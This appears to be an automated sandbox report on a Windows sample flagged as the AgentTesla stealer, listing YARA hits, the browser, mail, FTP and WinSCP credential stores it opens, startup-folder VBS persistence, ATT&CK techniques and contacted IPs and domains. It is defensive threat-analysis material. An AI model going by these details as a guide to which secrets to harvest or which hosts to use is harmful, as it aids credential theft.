                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Length.exeQueries volume information: C:\Users\user\AppData\Roaming\Length.exe VolumeInformation
                      Source: C:\Users\user\Desktop\Ref#66001032.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected AgentTesla
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 6.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ref#66001032.exe.444bce8.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ref#66001032.exe.444bce8.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000002.4610997762.0000000002B6C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.4610997762.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.4610997762.0000000002B74000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.4600898814.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.3486694329.0000000003861000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.3486694329.0000000004436000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Ref#66001032.exe PID: 2736, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6932, type: MEMORYSTR
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                      Tries to harvest and steal ftp login credentials
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: Yara matchFile source: 6.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ref#66001032.exe.444bce8.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ref#66001032.exe.444bce8.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000002.4610997762.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.4600898814.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.3486694329.0000000003861000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.3486694329.0000000004436000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Ref#66001032.exe PID: 2736, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6932, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected AgentTesla
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 6.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ref#66001032.exe.444bce8.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ref#66001032.exe.444bce8.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000002.4610997762.0000000002B6C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.4610997762.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.4610997762.0000000002B74000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.4600898814.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.3486694329.0000000003861000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.3486694329.0000000004436000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Ref#66001032.exe PID: 2736, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6932, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information111
                      Scripting                      		Valid Accounts121
                      Windows Management Instrumentation                      		111
                      Scripting                      		1
                      DLL Side-Loading                      		1
                      Disable or Modify Tools                      		2
                      OS Credential Dumping                      		2
                      File and Directory Discovery                      		Remote Services11
                      Archive Collected Data                      		1
                      Ingress Tool Transfer                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/Job1
                      DLL Side-Loading                      		1
                      Extra Window Memory Injection                      		1
                      Deobfuscate/Decode Files or Information                      		1
                      Input Capture                      		24
                      System Information Discovery                      		Remote Desktop Protocol2
                      Data from Local System                      		11
                      Encrypted Channel                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAt2
                      Registry Run Keys / Startup Folder                      		211
                      Process Injection                      		21
                      Obfuscated Files or Information                      		1
                      Credentials in Registry                      		311
                      Security Software Discovery                      		SMB/Windows Admin Shares1
                      Email Collection                      		1
                      Non-Standard Port                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                      Registry Run Keys / Startup Folder                      		2
                      Software Packing                      		NTDS1
                      Process Discovery                      		Distributed Component Object Model1
                      Input Capture                      		2
                      Non-Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      DLL Side-Loading                      		LSA Secrets141
                      Virtualization/Sandbox Evasion                      		SSHKeylogging23
                      Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Extra Window Memory Injection                      		Cached Domain Credentials1
                      Application Window Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                      Masquerading                      		DCSync1
                      System Network Configuration Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job141
                      Virtualization/Sandbox Evasion                      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt211
                      Process Injection                      		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1584676 Sample: Ref#66001032.exe Startdate: 06/01/2025 Architecture: WINDOWS Score: 100 34 shed.dual-low.s-part-0017.t-0009.t-msedge.net 2->34 36 s-part-0017.t-0009.t-msedge.net 2->36 38 2 other IPs or domains 2->38 58 Suricata IDS alerts for network traffic 2->58 60 Found malware configuration 2->60 62 Malicious sample detected (through community Yara rule) 2->62 64 11 other signatures 2->64 8 Ref#66001032.exe 19 7 2->8         started        13 wscript.exe 2->13         started        signatures3 process4 dnsIp5 40 oshi.at 5.253.86.15, 443, 49713, 61089 HOSTSLICK-GERMANYNL Cyprus 8->40 28 C:\Users\user\AppData\Roaming\Length.exe, PE32 8->28 dropped 30 C:\Users\user\AppData\Roaming\...\Length.vbs, ASCII 8->30 dropped 32 C:\Users\user\...\Length.exe:Zone.Identifier, ASCII 8->32 dropped 66 Drops VBS files to the startup folder 8->66 68 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 8->68 70 Writes to foreign memory regions 8->70 72 Injects a PE file into a foreign processes 8->72 15 InstallUtil.exe 14 2 8->15         started        19 EXCEL.EXE 221 187 8->19         started        74 Windows Scripting host queries suspicious COM object (likely to drop second stage) 13->74 22 Length.exe 13->22         started        file6 signatures7 process8 dnsIp9 42 162.254.34.31, 587, 61095 VIVIDHOSTINGUS United States 15->42 44 api.ipify.org 104.26.12.205, 443, 61094 CLOUDFLARENETUS United States 15->44 46 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 15->46 48 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 15->48 50 Tries to steal Mail credentials (via file / registry access) 15->50 56 2 other signatures 15->56 26 C:\Users\user\...\0.H$Loan$Payment Date.hidx, DOS 19->26 dropped 24 splwow64.exe 19->24         started        52 Multi AV Scanner detection for dropped file 22->52 54 Machine Learning detection for dropped file 22->54 file10 signatures11 process12

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      Ref#66001032.exe39%VirustotalBrowse
                      Ref#66001032.exe34%ReversingLabsWin32.Trojan.Leonem
                      Ref#66001032.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\Length.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\Length.exe34%ReversingLabsWin32.Trojan.Leonem

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://oshi.atd0%Avira URL Cloudsafe
                      http://schemas.microso0%Avira URL Cloudsafe
                      https://oshi.at/YBbz0%Avira URL Cloudsafe
                      http://oshi.at0%Avira URL Cloudsafe
                      http://schemas.micros0%Avira URL Cloudsafe
                      https://oshi.at/YBbzd0%Avira URL Cloudsafe
                      https://oshi.at0%Avira URL Cloudsafe
                      https://oshi.atD0%Avira URL Cloudsafe
                      http://schemas.microsoft.0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      oshi.at
                      		5.253.86.15
                      		truefalse
                        		high
                        s-part-0017.t-0009.t-msedge.net
                        		13.107.246.45
                        		truefalse
                          		high
                          api.ipify.org
                          		104.26.12.205
                          		truefalse
                            		high

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            https://api.ipify.org/false
                              		high
                              https://oshi.at/YBbzfalse
                              • Avira URL Cloud: safe
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://schemas.microsoexcel_doc.xlsx.0.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://oshi.atdLength.exe, 0000000B.00000002.4611018046.0000000003085000.00000004.00000800.00020000.00000000.sdmp, Length.exe, 0000000B.00000002.4611018046.0000000003160000.00000004.00000800.00020000.00000000.sdmp, Length.exe, 0000000B.00000002.4611018046.00000000030E8000.00000004.00000800.00020000.00000000.sdmp, Length.exe, 0000000B.00000002.4611018046.0000000003144000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://api.ipify.orgRef#66001032.exe, 00000000.00000002.3486694329.0000000004436000.00000004.00000800.00020000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3486694329.0000000003861000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4610997762.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4600898814.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                		high
                                http://schemas.miexcel_doc.xlsx.0.drfalse
                                  		high
                                  http://schemas.micexcel_doc.xlsx.0.drfalse
                                    		high
                                    https://github.com/mgravell/protobuf-netiRef#66001032.exe, 00000000.00000002.3486694329.0000000004297000.00000004.00000800.00020000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3523083171.0000000006220000.00000004.08000000.00040000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3486694329.0000000004393000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://stackoverflow.com/q/14436606/23354Ref#66001032.exe, 00000000.00000002.3469471200.00000000028BC000.00000004.00000800.00020000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3486694329.0000000004297000.00000004.00000800.00020000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3523083171.0000000006220000.00000004.08000000.00040000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3486694329.0000000004393000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://oshi.atLength.exe, 0000000B.00000002.4611018046.0000000003085000.00000004.00000800.00020000.00000000.sdmp, Length.exe, 0000000B.00000002.4611018046.0000000003160000.00000004.00000800.00020000.00000000.sdmp, Length.exe, 0000000B.00000002.4611018046.00000000030E8000.00000004.00000800.00020000.00000000.sdmp, Length.exe, 0000000B.00000002.4611018046.0000000003144000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://account.dyn.com/Ref#66001032.exe, 00000000.00000002.3486694329.0000000004436000.00000004.00000800.00020000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3486694329.0000000003861000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4600898814.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                          		high
                                          https://github.com/mgravell/protobuf-netJRef#66001032.exe, 00000000.00000002.3486694329.0000000004297000.00000004.00000800.00020000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3523083171.0000000006220000.00000004.08000000.00040000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3486694329.0000000004393000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://stackoverflow.com/q/11564914/23354;Ref#66001032.exe, 00000000.00000002.3486694329.0000000004297000.00000004.00000800.00020000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3523083171.0000000006220000.00000004.08000000.00040000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3486694329.0000000004393000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://stackoverflow.com/q/2152978/23354Ref#66001032.exe, 00000000.00000002.3486694329.0000000004297000.00000004.00000800.00020000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3523083171.0000000006220000.00000004.08000000.00040000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3486694329.0000000004393000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://oshi.at/YBbzdLength.exe, 0000000B.00000002.4611018046.0000000003071000.00000004.00000800.00020000.00000000.sdmp, Length.exe, 0000000B.00000002.4611018046.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, Length.exe, 0000000B.00000002.4611018046.0000000003154000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://github.com/mgravell/protobuf-netRef#66001032.exe, 00000000.00000002.3486694329.0000000004297000.00000004.00000800.00020000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3523083171.0000000006220000.00000004.08000000.00040000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3486694329.0000000004393000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://schemas.microsoft.excel_doc.xlsx.0.drfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://oshi.atRef#66001032.exe, 00000000.00000002.3469471200.0000000002801000.00000004.00000800.00020000.00000000.sdmp, Length.exe, 0000000B.00000002.4611018046.0000000003071000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://schemas.microsexcel_doc.xlsx.0.drfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://api.ipify.org/tInstallUtil.exe, 00000006.00000002.4610997762.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://schemas.micrexcel_doc.xlsx.0.drfalse
                                                      		high
                                                      https://oshi.atDLength.exe, 0000000B.00000002.4611018046.0000000003085000.00000004.00000800.00020000.00000000.sdmp, Length.exe, 0000000B.00000002.4611018046.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, Length.exe, 0000000B.00000002.4611018046.0000000003160000.00000004.00000800.00020000.00000000.sdmp, Length.exe, 0000000B.00000002.4611018046.0000000003144000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRef#66001032.exe, 00000000.00000002.3469471200.0000000002801000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4610997762.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, Length.exe, 0000000B.00000002.4611018046.0000000003071000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high

                                                        World Map of Contacted IPs

                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs

                                                        Public IPs

                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        104.26.12.205
                                                        		api.ipify.orgUnited States
                                                        		13335CLOUDFLARENETUSfalse
                                                        162.254.34.31
                                                        		unknownUnited States
                                                        		64200VIVIDHOSTINGUStrue
                                                        5.253.86.15
                                                        		oshi.atCyprus
                                                        		208046HOSTSLICK-GERMANYNLfalse

                                                        General Information

                                                        Joe Sandbox version:41.0.0 Charoite
                                                        Analysis ID:1584676
                                                        Start date and time:2025-01-06 07:54:06 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 9m 38s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:14
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:Ref#66001032.exe
                                                        Detection:MAL
                                                        Classification:mal100.troj.spyw.expl.evad.winEXE@10/108@2/3
                                                        EGA Information:
                                                        • Successful, ratio: 66.7%
                                                        HCA Information:
                                                        • Successful, ratio: 91%
                                                        • Number of executed functions: 384
                                                        • Number of non-executed functions: 42
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .exe
                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                        Warnings

                                                        • Exclude process from analysis (whitelisted): dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                        • Excluded IPs from analysis (whitelisted): 52.109.89.18, 52.109.32.7, 184.28.90.27, 52.113.194.132, 20.42.65.89, 13.107.246.45, 20.109.210.53, 20.190.159.71
                                                        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.afd.azureedge.net, weu-azsc-config.officeapps.live.com, osiprod-ukw-buff-azsc-000.ukwest.cloudapp.azure.com, eur.roaming1.live.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, ecs.office.com, self-events-data.trafficmanager.net, client.wns.windows.com, ukw-azsc-000.roaming.officeapps.live.com, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, s-0005.s-msedge.net, config.officeapps.live.com, azureedge-t-prod.trafficmanager.net, onedscolprdeus11.eastus.cloudapp.azure.com, ecs.office.trafficmanager.n
                                                        • Execution Graph export aborted for target Length.exe, PID 1364 because it is empty
                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                        • Report size getting too big, too many NtCreateFile calls found.
                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                        Simulations

                                                        Behavior and APIs

                                                        TimeTypeDescription
                                                        01:54:58API Interceptor3216648x Sleep call for process: Ref#66001032.exe modified
                                                        01:57:13API Interceptor15x Sleep call for process: InstallUtil.exe modified
                                                        01:57:22API Interceptor1650961x Sleep call for process: Length.exe modified
                                                        01:58:23API Interceptor389x Sleep call for process: splwow64.exe modified
                                                        07:57:12AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Length.vbs

                                                        Joe Sandbox View / Context

                                                        IPs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        104.26.12.205Yoranis Setup.exeGet hashmaliciousUnknownBrowse
                                                        • api.ipify.org/
                                                        RtU8kXPnKr.exeGet hashmaliciousQuasarBrowse
                                                        • api.ipify.org/
                                                        jgbC220X2U.exeGet hashmaliciousUnknownBrowse
                                                        • api.ipify.org/?format=text
                                                        xKvkNk9SXR.exeGet hashmaliciousTrojanRansomBrowse
                                                        • api.ipify.org/
                                                        GD8c7ARn8q.exeGet hashmaliciousTrojanRansomBrowse
                                                        • api.ipify.org/
                                                        8AbMCL2dxM.exeGet hashmaliciousRCRU64, TrojanRansomBrowse
                                                        • api.ipify.org/
                                                        Simple2.exeGet hashmaliciousUnknownBrowse
                                                        • api.ipify.org/
                                                        Ransomware Mallox.exeGet hashmaliciousTargeted RansomwareBrowse
                                                        • api.ipify.org/
                                                        Yc9hcFC1ux.exeGet hashmaliciousUnknownBrowse
                                                        • api.ipify.org/
                                                        6706e721f2c06.exeGet hashmaliciousRemcosBrowse
                                                        • api.ipify.org/
                                                        162.254.34.31Ref#20203216.exeGet hashmaliciousAgentTeslaBrowse
                                                          Ref#60031796.exeGet hashmaliciousAgentTeslaBrowse
                                                            Ref#1550238.exeGet hashmaliciousAgentTeslaBrowse
                                                              DJ5PhUwOsM.exeGet hashmaliciousAgentTesla, XWormBrowse
                                                                Ref#2056119.exeGet hashmaliciousAgentTesla, XWormBrowse
                                                                  Ref#501032.vbeGet hashmaliciousMassLogger RATBrowse
                                                                    Ref#150062.vbeGet hashmaliciousMassLogger RATBrowse
                                                                      BankInformation.vbeGet hashmaliciousAgentTeslaBrowse
                                                                        Booking_0731520.vbeGet hashmaliciousAgentTeslaBrowse
                                                                          SWIFTCOPY202973783.vbeGet hashmaliciousAgentTeslaBrowse
                                                                            5.253.86.15Ref#20203216.exeGet hashmaliciousAgentTeslaBrowse
                                                                              Ref_31020563.exeGet hashmaliciousUnknownBrowse
                                                                                Ref#60031796.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  Ref#1550238.exeGet hashmaliciousUnknownBrowse
                                                                                    JuneOrder.exeGet hashmaliciousAsyncRAT, Babadeda, PureLog Stealer, zgRATBrowse
                                                                                      TamenuV11.msiGet hashmaliciousUnknownBrowse
                                                                                        9K25QyJ4hA.exeGet hashmaliciousUnknownBrowse
                                                                                          9K25QyJ4hA.exeGet hashmaliciousUnknownBrowse
                                                                                            PAYMENT_RECEIPT_STAN100699.exeGet hashmaliciousUnknownBrowse
                                                                                              PAYMENT_RECEIPT_STAN100699.exeGet hashmaliciousUnknownBrowse

                                                                                                Domains

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                oshi.atRef#20203216.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                • 5.253.86.15
                                                                                                Ref_31020563.exeGet hashmaliciousUnknownBrowse
                                                                                                • 194.15.112.248
                                                                                                Ref_31020563.exeGet hashmaliciousUnknownBrowse
                                                                                                • 5.253.86.15
                                                                                                Ref#116670.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                • 194.15.112.248
                                                                                                Ref#60031796.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                • 194.15.112.248
                                                                                                Ref#1550238.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                • 194.15.112.248
                                                                                                Ref#1550238.exeGet hashmaliciousUnknownBrowse
                                                                                                • 5.253.86.15
                                                                                                Swift Payment MT103.lnkGet hashmaliciousUnknownBrowse
                                                                                                • 188.241.120.6
                                                                                                Facturation.exeGet hashmaliciousDoeneriumBrowse
                                                                                                • 188.241.120.6
                                                                                                Facturation.exeGet hashmaliciousDoeneriumBrowse
                                                                                                • 188.241.120.6
                                                                                                s-part-0017.t-0009.t-msedge.net#U7a0b#U5e8fv1.2.4.msiGet hashmaliciousUnknownBrowse
                                                                                                • 13.107.246.45
                                                                                                2749837485743-7684385786.05.exeGet hashmaliciousUnknownBrowse
                                                                                                • 13.107.246.45
                                                                                                Insomia.exeGet hashmaliciousLummaCBrowse
                                                                                                • 13.107.246.45
                                                                                                setup64v6.4.5.msiGet hashmaliciousUnknownBrowse
                                                                                                • 13.107.246.45
                                                                                                3LcZO15oTC.exeGet hashmaliciousUnknownBrowse
                                                                                                • 13.107.246.45
                                                                                                3LcZO15oTC.exeGet hashmaliciousUnknownBrowse
                                                                                                • 13.107.246.45
                                                                                                Tax_Refund_Claim_2024_Australian_Taxation_Office.jsGet hashmaliciousRemcosBrowse
                                                                                                • 13.107.246.45
                                                                                                4XYAW8PbZH.exeGet hashmaliciousRemcosBrowse
                                                                                                • 13.107.246.45
                                                                                                GpuXmm386e.msiGet hashmaliciousUnknownBrowse
                                                                                                • 13.107.246.45
                                                                                                yKkpG6xM4S.msiGet hashmaliciousUnknownBrowse
                                                                                                • 13.107.246.45
